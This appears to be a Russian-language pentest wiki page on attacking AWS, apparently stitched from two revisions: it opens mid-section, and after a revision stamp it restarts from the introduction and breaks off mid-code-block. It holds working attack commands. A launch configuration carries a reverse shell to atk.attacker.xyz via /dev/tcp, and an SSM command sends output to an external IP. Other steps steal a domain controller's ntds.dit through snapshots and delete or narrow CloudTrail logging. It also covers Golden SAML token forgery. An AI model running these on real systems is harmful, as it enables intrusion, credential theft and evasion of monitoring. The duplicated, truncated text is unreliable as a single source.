Позволяет создать новый привилегированный профиль для инстанса и прикрепить его к скомпрометированной EC2-машине.

=== Роли - управление ===

==== ec2:CreateVolume + ec2:AttachVolume ====

См. EBS.

==== ec2:DescribeSnapshots ====

Позволяет посмотреть информацию о SnapShot'ах, которые позже мб потребуется прочитать:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 describe-snapshots --profile flawscloud --owner-id 975426262029 --region us-west-2
</syntaxhighlight>

==== ec2:CreateVolume ====

Прзврояет примаунтить SnapShot, чтобы потом его изучить:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 create-volume --profile YOUR_ACCOUNT --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89
</syntaxhighlight>

==== ec2:* (Копирование EC2) ====

Позволяет скопировать EC2 используя AMI-images:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создаем новый AMI из Instance-ID
aws ec2 create-image --instance-id i-0438b003d81cd7ec5 --name "AWS Audit" --description "Export AMI" --region eu-west-1

# Добавляем наш ключ в систему
aws ec2 import-key-pair --key-name "AWS Audit" --public-key-material file://~/.ssh/id_rsa.pub --region eu-west-1

# Создаем EC2-Instance используя созданный AMI (параметры security group и подсеть оставили те же)
aws ec2 run-instances --image-id ami-0b77e2d906b00202d --security-group-ids "sg-6d0d7f01" --subnet-id subnet-9eb001ea --count 1 --instance-type t2.micro --key-name "AWS Audit" --query "Instances[0].InstanceId" --region eu-west-1

# Проверяем запустился ли инстанс
aws ec2 describe-instances --instance-ids i-0546910a0c18725a1

# Не обязательно - редактируем группу инстанса
aws ec2 modify-instance-attribute --instance-id "i-0546910a0c18725a1" --groups "sg-6d0d7f01" --region eu-west-1

# В конце работы - останавливаем и удаляем инстанс
aws ec2 stop-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1
aws ec2 terminate-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1
</syntaxhighlight>

==== ec2-instance-connect:SendSSHPublicKey ====

Добавить SSH-ключ к EC2-инстансу. Ключ будет существовать 60 секунд.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получаем информацию об инстансе, который будем атаковать.
aws ec2 describe-instances --profile uploadcreds --region eu-west-1 | jq ".[][].Instances | .[] | {InstanceId, KeyName, State}"

# Добавляем ключ к EC2-инстансу.
aws ec2-instance-connect send-ssh-public-key --region us-east-1 --instance-id INSTANCE --availability-zone us-east-1d --instance-os-user ubuntu --ssh-public-key file://shortkey.pub --profile uploadcreds</syntaxhighlight>

==== ec2-instance-connect:SendSerialConsoleSSHPublicKey ====

Добавить SSH-ключ к EC2-инстансу. Ключ будет существовать 60 секунд.

В отличие от предыдущего пункта, этот ключ можно использовать только при подключении EC2 Serial Console.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получаем информацию об инстансе, который будем атаковать.
aws ec2 describe-instances --profile uploadcreds --region eu-west-1 | jq ".[][].Instances | .[] | {InstanceId, KeyName, State}"

# Добавляем ключ к EC2-инстансу.
aws ec2-instance-connect send-serial-console-ssh-public-key --instance-id i-001234a4bf70dec41EXAMPLE --serial-port 0 --ssh-public-key file://my_key.pub --region us-east-1

# Подключаемся (кроме GovCloud US региона)
ssh -i my_key i-001234a4bf70dec41EXAMPLE.port0@serial-console.ec2-instance-connect.us-east-1.aws
# Подключаемся (только для GovCloud US региона)
ssh -i my_key i-001234a4bf70dec41EXAMPLE.port0@serial-console.ec2-instance-connect.us-gov-east-1.amazonaws.com

# В некоторых случаях нужно подключиться к EC2 и перезагрузить сервис getty (лучше пробовать только, когда не смогли подключиться)
sudo systemctl restart serial-getty@ttyS0
# Если не сработало - мб требуется ребутать сервер.
</syntaxhighlight>

Также можно подключиться, используя браузер. Подробнее тут: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/connect-to-serial-console.html

==== ssm:SendCommand ====

Позволяет запускать команды в EC2-Instances. Если нет дополнительных прав, то потребуется:

* Знать Instance-ID, на котором запущен сервис SSM

* Свой сервер, на который будет приходить отстук - результат команды.

Команды для эксплуатации:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получаем информацию о SSM сервисах - может потребоваться ssm:DescribeInstanceInformation
aws ssm describe-instance-information --profile stolencreds --region eu-west-1
# Выполняем команду
aws ssm send-command --instance-ids "INSTANCE-ID-HERE" --document-name "AWS-RunShellScript" --comment "IP Config" --parameters commands=ifconfig --output text --query "Command.CommandId" --profile stolencreds
# Получаем результат команды(может не хватить прав ssm:ListCommandInvocations)
aws ssm list-command-invocations --command-id "COMMAND-ID-HERE" --details --query "CommandInvocations[].CommandPlugins[].{Status:Status,Output:Output}" --profile stolencreds

# Пример - результат команды на удаленный сервер
$ aws ssm send-command --instance-ids "i-05b████████adaa" --document-name "AWS-RunShellScript" --comment "whoami" --parameters commands='curl 162.243.███.███:8080/`whoami`' --output text --region=us-east-1
</syntaxhighlight>

==== EC2:CreateSnapshot + Active Directory ====

См. AD.

== Auto Scaling (autoscaling) ==

Сервис для масштабирования приложений. Работает преимущественно с EC2, ECS, DynamoDB (таблицы и индексы) и Aurora.

Для работы сервиса требуется:

1. Конфигурация запуска EC2.

2. Конфигурация масштабирования.

== Роли - повышение привилегий ==

=== autoscaling:CreateLaunchConfiguration + autoscaling:Create(Update)AutoScalingGroup + iam:PassRole ===

Позволяет создать и запустить конфигурацию масштабирования.

==== Создаем конфигурацию запуска EC2 ====

Для создания требуется:

1. Image-id

2. iam-instance-profile

Следующая команда создает конфигурацию с командой из файла reverse-shell.sh:

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws autoscaling create-launch-configuration --launch-configuration-name demo3-LC --image-id ami-0f90b6b11936e1083 --instance-type t1.micro --iam-instance-profile demo-EC2Admin --metadata-options "HttpEndpoint=enabled,HttpTokens=optional" --associate-public-ip-address --user-data=file://reverse-shell.sh
</syntaxhighlight>

Пример содержимого reverse-shell.sh:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
#!/bin/bash
/bin/bash -l > /dev/tcp/atk.attacker.xyz/443 0<&1 2>&1
</syntaxhighlight>

==== Создаем и запускаем группу масштабируемости ====

Привилегия ec2:DescribeSubnets нужна для выбора нужной сети (чтобы EC2 смог сделать reverse-соедиенение к нам).

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws autoscaling create-auto-scaling-group --auto-scaling-group-name demo3-ASG --launch-configuration-name demo3-LC --min-size 1 --max-size 1 --vpc-zone-identifier "subnet-aaaabbb"
</syntaxhighlight>

Подробнее тут https://notdodo.medium.com/aws-ec2-auto-scaling-privilege-escalation-d518f8e7f91b

== AD (Directory Service) ==

Второе название - AWS Managed Microsoft Active Directory. Позволяет использовать Active Directory в AWS.

Основные понятия:

* EC2-Instance - VPS на которых крутится весь Active Directory

=== Роли - повышение привилегий ===

==== EC2:CreateSnapshot + EC2:RunInstance -> ShadowCopy ====

Позволяет провести атаку ShadowCopy на доменный контроллер и считать учетные данные всех пользователей.

Последовательность атаки:

1. Получаем список инстансов

2. Создаем Snapshot выбранного сервера

3. Редактируем атрибуты у SnapShot для доступа с аккаунта атакующего.
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 modify-snapshot-attribute --snapshot-id snap-1234567890abcdef0 --attribute createVolumePermission --operation-type remove --user-ids 123456789012
</syntaxhighlight>

4. Переключаемся на аккаунт атакующего

5. Создаем новый Linux EC2-инстанс, к которому будет прикреплен SnapShot

6. Подключаемся по SSH и получаем данные из SnapShot
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
sudo -s
mkdir /tmp/windows
mount /dev/xvdf1 /tmp/windows/
cd /tmp/windows/
</syntaxhighlight>

7. Работаем с данными на примонтированном диске, который будет в /tmp/windows/. Пример команд для извлечения ntds.dit:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
cp /windows/Windows/NTDS/ntds.dit /home/ec2-user
cp /windows/Windows/System32/config/SYSTEM /home/ec2-user
chown ec2-user:ec2-user /home/ec2-user/*
# Sftp - скачиваем файлы:
/home/ec2-user/SYSTEM
/home/ec2-user/ntds.dit
# Получаем учетные данные, используя Impacket-secretsdump
secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local -outputfile secrets
</syntaxhighlight>

== CloudTrail ==

Сервис для аудита событий в AWS-аккаунте (включен в каждом аккаунте по-умолчанию). Сервис позволяет вести журналы, осуществлять непрерывный мониторинг и сохранять информацию об истории аккаунта в пределах всей используемой инфраструктуры AWS.

Записывает:

* API-вызовы

* Логины в систему

* События сервисов

* ???

Важен при операциях RedTeam.

Название файла логов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
AccountID_CloudTrail_RegionName_YYYYMMDDTHHmmZ_UniqueString.FileNameFormat
</syntaxhighlight>

S3 путь до логов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
BucketName/prefix/AWSLogs/AccountID/CloudTrail/RegionName/YYYY/MM/DD
</syntaxhighlight>

Путь у CloudTrail-Digest файлов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
s3://s3-bucket-name/optional-prefix/AWSLogs/aws-account-id/CloudTrail-Digest/region/digest-end-year/digest-end-month/digest-end-data/aws-account-id_CloudTrail-Digest_region_trail-name_region_digest_end_timestamp.json.gz
</syntaxhighlight>

Основные поля у событий:

* eventName - имя API-endpoint

* eventSource - вызванный сервис

* eventTime - время события

* SourceIPAddress - ip-адрес источника

* userAgent - метод запроса
** "signing.amazonaws.com" - запрос от AWS Management Console
** "console.amazonaws.com" - запрос от root-пользователя аккаунта
** "lambda.amazonaws.com" - запрос от AWS Lambda

* requestParameters - параметры запроса

* responseElements - элементы ответа.

Временные параметры:

* 5 минут - сохраняется новый лог-файл

* 15 минут - сохраняется в S3.

Важно! Сохраняется чексумма файлов, поэтому пользователи могут удостовериться что логи не менялись.
Также логи могут уходить напрямую в CloudWatch - администраторам может прилететь уведомление об ИБ-инцидентах. Или события могут быть проанализированы внутренним модулем CloudTrail - Insights на предмет необычной активности.

=== Роли - управление ===

==== cloudtrail:DeleteTrail ====

Позволяет отключить мониторинг:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws cloudtrail delete-trail --name cloudgoat_trail --profile administrator
</syntaxhighlight>

==== cloudtrail:UpdateTrail ====

Права на редактирование правил монитринга.

Отключить мониторинг глобальных сервисов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event
</syntaxhighlight>

Отключить мониторинг на конкретные регионы:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event --no-is-multi-region --region=eu-west
</syntaxhighlight>

==== validate-logs ====

Проверить, были ли изменены логи.

aws cloudtrail validate-logs --trail-arn <trailARN> --start-time <start-time> [--end-time <end-time>] [--s3-bucket <bucket-name>] [--s3-prefix <prefix>] [--verbose]

=== Эксплуатация ===

==== Обход правила по UserAgent ====

На сервисе есть правило, по которому определяет, что запросы были сделаны с kali/parrot/pentoo используя awscli.

Для этого можно воспользоваться утилитой pacu, которая автоматически подменяет useragent. Использование утилиты в конце статьи.

== DynamoDB ==

Cистема управления базами данных класса NoSQL в формате «ключ — значение».

=== Роли - управление ===

==== dynamodb:ListTables ====

Позволяет посмотреть спрсок таблиц базы данных.
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws --endpoint-url http://s3.bucket.htb dynamodb list-tables

{
"TableNames": [
"users"
]
}
</syntaxhighlight>

==== dynamodb:Scan ====

Получение обьектов из базы данных:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws --endpoint-url http://s3.bucket.htb dynamodb scan --table-name users | jq -r '.Items[]'

{
"password": {
"S": "Management@#1@#"
},
"username": {
"S": "Mgmt"
}
}
</syntaxhighlight>

== ES (ElasticSearch) ==

ElasticSearch от AWS. Используется для просмотра логов/журналов, поиска на вебсайте и тд.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{user_provided}-{random_id}.{region}.es.amazonaws.com
</syntaxhighlight>

== ELB (Elastic Load Balancing) ==

Балансировщик нагрузки.

Формат ссылки (elb_v1):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
http://{user_provided}-{random_id}.{region}.elb.amazonaws.com:80/443
</syntaxhighlight>

Формат ссылки (elb_v2):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{user_provided}-{random_id}.{region}.elb.amazonaws.com
</syntaxhighlight>

== RDS (Relational Database Service) ==

Облачная реляционная база данных (на выбор).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
mysql://{user_provided}.{random_id}.{region}.rds.amazonaws.com:3306
postgres://{user_provided}.{random_id}.{region}.rds.amazonaws.com:5432
</syntaxhighlight>

== Route 53 ==

Настраиваемая служба DNS.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
{user_provided}
</syntaxhighlight>

== API Gateway ==

API-сервис, который будет доступен почти со всех серверов.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{restapi_id}.execute-api.{region}.amazonaws.com/{stage_name}/
https://{random_id}.execute-api.{region}.amazonaws.com/{user_provided}
</syntaxhighlight>

== CloudSearch ==

Альтернатива сервису ElasticSearch. Система для упрощения поиска для администрирования и, например, на вебсайте.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://doc-{user_provided}-{random_id}.{region}.cloudsearch.amazonaws.com
</syntaxhighlight>

== Transfer Family ==

Группа сервисов для передачи файлов (S3/EFS) по (SFTP, FTPS, FTP).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
sftp://s-{random_id}.server.transfer.{region}.amazonaws.com
ftps://s-{random_id}.server.transfer.{region}.amazonaws.com
ftp://s-{random_id}.server.transfer.{region}.amazonaws.com
</syntaxhighlight>

== IoT (Internet Of Things) ==

Сервис для управления IoT-устройствами.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
mqtt://{random_id}.iot.{region}.amazonaws.com:8883
https://{random_id}.iot.{region}.amazonaws.com:8443
https://{random_id}.iot.{region}.amazonaws.com:443
</syntaxhighlight>

== MQ ==

Сервис брокера сообщений для Apache ActiveMQ & RabbitMQ.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:8162
ssl://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:61617
</syntaxhighlight>

== MSK (Managed Streaming for Apache Kafka) ==

Сервис потоковой передачи данных в Apache Kafka.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
b-{1,2,3,4}.{user_provided}.{random_id}.c{1,2}.kafka.{region}.amazonaws.com
{user_provided}.{random_id}.c{1,2}.kafka.useast-1.amazonaws.com
</syntaxhighlight>

== Cloud9 ==

Облачная интегрированная среда разработки(IDE) используя только браузер.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.vfs.cloud9.{region}.amazonaws.com
</syntaxhighlight>

== MediaStore ==

Cервис хранилища AWS, оптимизированный для мультимедийных материалов.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.data.mediastore.{region}.amazonaws.com
</syntaxhighlight>

== Kinesis Video Streams ==

Обеспечивает простую и безопасную потоковую передачу видео с подключенных устройств в AWS для воспроизведения, аналитики, машинного обучения (ML) и других видов обработки.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.kinesisvideo.{region}.amazonaws.com
</syntaxhighlight>

== Elemental MediaConvert ==

Сервис перекодирования видеофайлов с возможностями на уровне вещательных компаний. Он позволяет просто создавать контент в формате «видео по требованию» (VOD) для трансляций, в том числе мультиэкранных, в любом масштабе.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.mediaconvert.{region}.amazonaws.com
</syntaxhighlight>

== Elemental MediaPackage ==

Cервис для подготовки и защиты видеоконтента, распространяемого через Интернет. AWS Elemental MediaPackage использует один источник видео и создает на его основе специализированные видеопотоки для воспроизведения на подключенных телевизорах, мобильных телефонах, компьютерах, планшетах и игровых консолях.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.mediapackage.{region}.amazonaws.com/in/v1/{random_id}/channel
</syntaxhighlight>

== ECR (Elastic Container Registry) ==

Региональный сервис, предназначенный для обеспечения гибкого развертывания образов.

=== Роли - управление ===

==== ecr:ListImages ====

Получить список образов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ecr list-images --repository-name <ECR_name> --registry-id <UserID> --region <region> --profile <profile_name>
</syntaxhighlight>

==== ecr:GetDownloadUrlForLayer ====

Позволяет получить URL на скачивание образа.

==== ecr:GetDownloadUrlForLayer + ecr:BatchGetImage + ecr:GetAuthorizationToken ====

Позволяет скачать образ (мб потребуется и ecr:ListImages чтобы получить список образов):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ecr get-login
docker pull <UserID>.dkr.ecr.us-east-1.amazonaws.com/<ECRName>:latest
docker inspect sha256:079aee8a89950717cdccd15b8f17c80e9bc4421a855fcdc120e1c534e4c102e0
</syntaxhighlight>

== Augmented AI (Amazon A2I) ==

https://aws.amazon.com/ru/augmented-ai/

== CodeGuru ==

https://aws.amazon.com/ru/codeguru/

== Comprehend ==

https://aws.amazon.com/ru/comprehend/

== DevOps Guru ==

https://aws.amazon.com/ru/devops-guru/

== Elastic Inference ==

https://aws.amazon.com/machine-learning/elastic-inference/

== Forecast ==

https://aws.amazon.com/ru/forecast/

== Fraud Detector ==

https://aws.amazon.com/ru/fraud-detector/

== HealthLake ==

https://aws.amazon.com/healthlake/

== Kendra ==

https://aws.amazon.com/kendra/?did=ap_card&trk=ap_card

== Lex ==

https://aws.amazon.com/lex/?did=ap_card&trk=ap_card

== Lookout for Equipment ==

https://aws.amazon.com/ru/lookout-for-equipment/

== Lookout for Metrics ==

https://aws.amazon.com/lookout-for-metrics/

== Lookout for Vision ==

https://aws.amazon.com/lookout-for-vision/

== Monitron ==

https://aws.amazon.com/monitron/

== Personalize ==

https://aws.amazon.com/personalize/

== Polly ==

https://aws.amazon.com/polly/

== Rekognition ==

https://aws.amazon.com/rekognition/

== SageMaker ==

https://aws.amazon.com/sagemaker/

== SageMaker Ground Truth ==

https://aws.amazon.com/sagemaker/groundtruth/

== Textract ==

https://aws.amazon.com/textract/

== Transcribe ==

https://aws.amazon.com/transcribe/

== Translate ==

https://aws.amazon.com/translate/

== Apache MXNet ==

https://aws.amazon.com/ru/mxnet/

== Deep Learning Containers ==

https://aws.amazon.com/machine-learning/containers/

== DeepComposer ==

https://aws.amazon.com/deepcomposer/

== DeepLens ==

https://aws.amazon.com/deeplens/

== DeepRacer ==

https://aws.amazon.com/deepracer/

== Inferentia ==

https://aws.amazon.com/machine-learning/inferentia/

== Panorama ==

https://aws.amazon.com/panorama/

== PyTorch ==

https://aws.amazon.com/pytorch/

== TensorFlow ==

https://aws.amazon.com/tensorflow/

== Deep Learning AMI ==

https://aws.amazon.com/machine-learning/amis/

= Утилиты =

== Вычисление ролей ==

=== enumerate-iam ===
github.com:andresriancho/enumerate-iam.git

== Эксплуатация ==

=== Golden SAML ===

Суть атаки в том, что зная ключ, которым подписываются SAML-запросы, вы можете подделать ответ и получить произвольные привилегии в SSO.

Подробнее про эксплуатацию тут: https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps

==== shimit ====
https://github.com/cyberark/shimit

Установка:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
cd /tmp
python -m pip install boto3 botocore defusedxml enum python_dateutil lxml signxml
git clone https://github.com/cyberark/shimit
cd shmit
python shmit.py
</syntaxhighlight>

В начале потребуется доступ к AD FS аккаунту из персонального хранилища которого украсть приватный ключ ключ.
Сделать это можно используя mimikatz, но в примере сделано через библиотеку Microsoft.Adfs.Powershell и powershell

Пример эксплуатации:
<syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:auto" >
# Получаем приватный ключ
[System.Convert]::ToBase64String($cer.rawdata)
(Get-ADFSProperties).Identifier.AbsoluteUri
(Get-ADFSRelyingPartyTrust).IssuanceTransformRule

# Получаем инфу о юзерах - выбираем цель
aws iam list-users

# Получаем токен
python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file
-u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012

# Проверяем текущий аккаунт
aws opsworks describe-my-user-profile
</syntaxhighlight>

== Проверки безопасности ==

Для администраторов преимущественно.

=== Zeus ===

https://github.com/DenizParlak/Zeus

== Другое ==

=== aws_consoler ===

https://github.com/NetSPI/aws_consoler

== All-In-One ==

=== pacu ===

https://github.com/RhinoSecurityLabs/pacu

=== ScoutSuite ===

https://github.com/nccgroup/ScoutSuite

=== cloudfox ===

https://github.com/BishopFox/cloudfox

= Ссылки =

== Статьи ==

[https://frichetten.com/blog/hijack-iam-roles-and-avoid-detection/ Hijacking IAM Roles and Avoiding Detection]

[https://frichetten.com/blog/bypass-guardduty-pentest-alerts/ Bypass GuardDuty PenTest Alerts]

[https://frichetten.com/blog/ssm-agent-tomfoolery/ Intercept SSM Agent Communications]

== Лаборатории ==

[https://medium.com/poka-techblog/privilege-escalation-in-the-cloud-from-ssrf-to-global-account-administrator-fd943cf5a2f6 Damn Vulnerable Cloud Application]

[https://github.com/nccgroup/sadcloud SadCloud]

[http://flaws.cloud Flaws]

[http://flaws2.cloud/ Flaws]

[https://xakep.ru/2022/03/21/htb-stacked/ HackTheBox Stacked Writeup]

[https://github.com/RhinoSecurityLabs/cloudgoat CloudGoat]

[https://github.com/nccgroup/sadcloud SadCloud]

[https://www.wellarchitectedlabs.com/security/ AWS Well-Architected Labs]

[https://labs.withsecure.com/publications/attack-detection-fundamentals-2021-aws-lab-1 Attack Detection Fundamentals 2021: AWS - Lab #1]

== Краткие заметки ==

[https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20AWS%20Pentest.md PayloadAllTheThings]

[https://book.hacktricks.xyz/pentesting/pentesting-web/buckets/aws-s3 hacktricks-s3]

[https://book.hacktricks.xyz/cloud-security/aws-security hacktricks-aws]

[https://learntocloud.guide/#/phase5/README learntocloud(много ссылок)]

== Книги ==

[https://www.amazon.com/dp/1789136725/ Hands-On AWS Penetration Testing with Kali Linux]

Aws

2022-10-07T11:47:42Z

Drakylar: /* Cognito */

AWS - Amazon Web Service. Одна из первых облачных систем, состоящая из многих сервисов, которые при некорректной настройке оставляют дыры в безопасности.

= Организационные моменты =

При проведении тестирования на проникновение, требуется предупредить AWS (составить заявку).

Подробнее тут: https://aws.amazon.com/ru/security/penetration-testing/

= Общие концепции =

== Службы ==

Концепция служб в AWS позволяет автоматизировать многие процессы, включая саму разработку архитектуры.

Это экосистема многих сервисов. И AWS стремится увеличить их количество.

Например, связать сервис сбора логов и сервис по реагированию на инциденты, а результаты класть на сервис S3.

== Регионы ==

AWS разделен на регионы. Часть сервисов кросс-региональные, но большинство привязываются к конкретным регионам.

{| class="wikitable"
|+Регионы AWS
|-
| '''Название региона'''
| '''Endpoint(HTTPS)'''
|-
|us-east-2
|rds.us-east-2.amazonaws.com

rds-fips.us-east-2.api.aws

rds.us-east-2.api.aws

rds-fips.us-east-2.amazonaws.com
|-
|us-east-1
|rds.us-east-1.amazonaws.com

rds-fips.us-east-1.api.aws

rds-fips.us-east-1.amazonaws.com

rds.us-east-1.api.aws
|-
|us-west-1
|rds.us-west-1.amazonaws.com

rds.us-west-1.api.aws

rds-fips.us-west-1.amazonaws.com

rds-fips.us-west-1.api.aws
|-
|us-west-2
|rds.us-west-2.amazonaws.com

rds-fips.us-west-2.amazonaws.com

rds.us-west-2.api.aws

rds-fips.us-west-2.api.aws
|-
|af-south-1
|rds.af-south-1.amazonaws.com

rds.af-south-1.api.aws
|-
|ap-east-1
|rds.ap-east-1.amazonaws.com

rds.ap-east-1.api.aws
|-
|ap-southeast-3
|rds.ap-southeast-3.amazonaws.com
|-
|ap-south-1
|rds.ap-south-1.amazonaws.com

rds.ap-south-1.api.aws
|-
|ap-northeast-3
|rds.ap-northeast-3.amazonaws.com

rds.ap-northeast-3.api.aws
|-
|ap-northeast-2
|rds.ap-northeast-2.amazonaws.com

rds.ap-northeast-2.api.aws
|-
|ap-southeast-1
|rds.ap-southeast-1.amazonaws.com

rds.ap-southeast-1.api.aws
|-
|ap-southeast-2
|rds.ap-southeast-2.amazonaws.com

rds.ap-southeast-2.api.aws
|-
|ap-northeast-1
|rds.ap-northeast-1.amazonaws.com

rds.ap-northeast-1.api.aws
|-
|ca-central-1
|rds.ca-central-1.amazonaws.com

rds.ca-central-1.api.aws

rds-fips.ca-central-1.api.aws

rds-fips.ca-central-1.amazonaws.com
|-
|eu-central-1
|rds.eu-central-1.amazonaws.com

rds.eu-central-1.api.aws
|-
|eu-west-1
|rds.eu-west-1.amazonaws.com

rds.eu-west-1.api.aws
|-
|eu-west-2
|rds.eu-west-2.amazonaws.com

rds.eu-west-2.api.aws
|-
|eu-south-1
|rds.eu-south-1.amazonaws.com

rds.eu-south-1.api.aws
|-
|eu-west-3
|rds.eu-west-3.amazonaws.com

rds.eu-west-3.api.aws
|-
|eu-north-1
|rds.eu-north-1.amazonaws.com

rds.eu-north-1.api.aws
|-
|me-south-1
|rds.me-south-1.amazonaws.com

rds.me-south-1.api.aws
|-
|sa-east-1
|rds.sa-east-1.amazonaws.com

rds.sa-east-1.api.aws
|-
|us-gov-east-1
|rds.us-gov-east-1.amazonaws.com
|-
|us-gov-west-1
|rds.us-gov-west-1.amazonaws.com
|}

Или только регионы (могут пригодиться при переборе):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
us-east-2
us-east-1
us-west-1
us-west-2
af-south-1
ap-east-1
ap-southeast-3
ap-south-1
ap-northeast-3
ap-northeast-2
ap-southeast-1
ap-southeast-2
ap-northeast-1
ca-central-1
eu-central-1
eu-west-1
eu-west-2
eu-south-1
eu-west-3
eu-north-1
me-south-1
sa-east-1
us-gov-east-1
us-gov-west-1
</syntaxhighlight>

== Доступы ==

== Консольная утилита(awscli) ==

Чаще всего для взаимодействия с сервисами AWS вам потребуется консольная утилита awscli.

Утилита работает с настроенными профилями.

=== Файлы ===

==== ~/.aws/credentials ====

Файл с учетными данными профилей. Перефразирую: получив данные из этого файла вы, вероятнее всего, получите контроль над аккаунтами в нем.

У каждого профиля будет указан:

* Access Key ID - 20 случайных букв/цифр в верхнем регистре, часто начинается с "AKIA..."

* Access Key - 40 случайных символов различного регистра.

* Access Token - не всегда указывается

Полный список параметров можно посмотреть тут: https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-files.html#cli-configure-files-settings

Пример содержимого файла (сохранен профиль default):

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
[default]
aws_access_key_id=AKIAIOSFODNN7EXAMPLE
aws_secret_access_key=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
aws_session_token = AQoEXAMPLEH4aoAH0gNCAPyJxz4BlCFFxWNE1OPTgk5TthT+FvwqnKwRcOIfrRh3c/LTo6UDdyJwOOvEVPvLXCrrrUtdnniCEXAMPLE/IvU1dYUg2RVAJBanLiHb4IgRmpRV3zrkuWJOgQs8IZZaIv2BXIa2R4Olgk
</syntaxhighlight>

==== ~/.aws/config ====

Файл с региональными настройками профиля(регион по-умолчанию).
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
[default]
region=us-west-2
output=json
</syntaxhighlight>

==== ~/.aws/cli/cache ====

Закешированные учетные данные

==== ~/.aws/sso/cache ====

Закешированные данные Single-Sign-On

=== Команды ===

Общее построение команды выглядит как:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws <название_сервиса> <действие> <дополнительные_аргументы>
</syntaxhighlight>

Примеры:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Вывести все S3-хранилища.
aws s3 ls

# Создание нового пользователя - сервис IAM
aws iam create-user --user-name aws-admin2
</syntaxhighlight>

== IMDS (Instance Metadata Service) ==

Это http API для запросов из EC2. Полезно если, например, у вас есть уязвимость SSRF в EC2.

Есть 2 версии:

*IMDSv1 - версия 1 по-умолчанию, не требует токен.

*IMDSv2 - версия 2, для запросов требуется токен.

Запрос без токена:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
curl http://169.254.169.254/latest/meta-data/
</syntaxhighlight>

Запрос с токеном:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
